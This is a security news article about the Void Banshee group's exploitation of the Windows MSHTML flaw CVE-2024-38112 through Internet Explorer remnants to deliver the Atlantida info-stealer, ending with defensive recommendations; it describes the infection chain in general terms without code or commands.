Security researchers have uncovered a sophisticated cyber attack campaign orchestrated by the advanced persistent threat (APT) group, Void Banshee. The group has been observed exploiting a critical Windows zero-day vulnerability, identified as CVE-2024-38112, to execute malicious code through the supposedly disabled Internet Explorer browser.
Understanding CVE-2024-38112
CVE-2024-38112 is classified as a Windows MSHTML Platform Spoofing Vulnerability, with a CVSS score of 7.5. This security flaw allows attackers to manipulate the target environment, potentially leading to unauthorized code execution. To exploit the vulnerability, threat actors must convince victims to open specially crafted malicious files.
Trend Micro’s cybersecurity experts detected active exploitation of this zero-day in May 2024. Following their report to Microsoft, the tech giant addressed the vulnerability in its July 2024 Patch Tuesday security updates.
Void Banshee’s Attack Methodology
The APT group’s attack chain begins with social engineering tactics. Victims are lured into opening zip archives containing malicious files disguised as PDF books. These archives are strategically distributed through various channels, including cloud-sharing websites, Discord servers, and online libraries.
Void Banshee’s primary targets appear to be in North America, Europe, and Southeast Asia, indicating a broad geographical focus for their cybercriminal activities.
Exploiting Internet Explorer’s Lingering Presence
Despite Internet Explorer being officially disabled, Void Banshee managed to leverage the browser’s remnants within the Windows operating system. The group exploited CVE-2024-38112 to execute HTML Application (HTA) files using carefully crafted .URL files. This technique involves the MHTML protocol handler and the x-usc! directive, bearing similarities to the exploitation of a previous MSHTML flaw, CVE-2021-40444.
The attack method is particularly concerning because Internet Explorer no longer receives updates or security patches, leaving it vulnerable to exploitation.
The Infection Chain
- Victims are directed to an attacker-controlled domain via a malicious internet shortcut file.
- An HTML file on the compromised website downloads the HTA stage of the infection chain.
- The HTA file, disguised as a PDF, is executed, triggering a series of malicious scripts.
- The LoadToBadXml .NET trojan loader, Donut shellcode, and ultimately the Atlantida info-stealer are deployed on the victim’s system.
Atlantida Info-Stealer: A Potent Threat
The primary payload of this attack is the Atlantida info-stealer. This malware is designed to:
- Gather detailed system information
- Steal sensitive data, including passwords and cookies
- Target multiple applications for data exfiltration
Implications for Cybersecurity
This zero-day attack serves as a stark reminder that unsupported Windows components can serve as overlooked attack vectors. Even disabled services like Internet Explorer can be exploited by skilled threat actors to deploy ransomware, backdoors, or other malicious payloads.
Trend Micro researchers emphasize the severity of the situation: “The ability of APT groups like Void Banshee to exploit disabled services such as IE poses a significant threat to organizations worldwide. Since services such as IE have a large attack surface and no longer receive patches, it represents a serious security concern to Windows users.”
Protective Measures
To mitigate the risks associated with this zero-day and similar vulnerabilities:
- Apply the latest Microsoft security patches promptly
- Implement robust email and web filtering solutions
- Educate users about the dangers of opening suspicious attachments or links
- Consider disabling or removing unused components and protocols within the Windows environment
- Employ advanced endpoint protection and monitoring tools to detect and prevent sophisticated attacks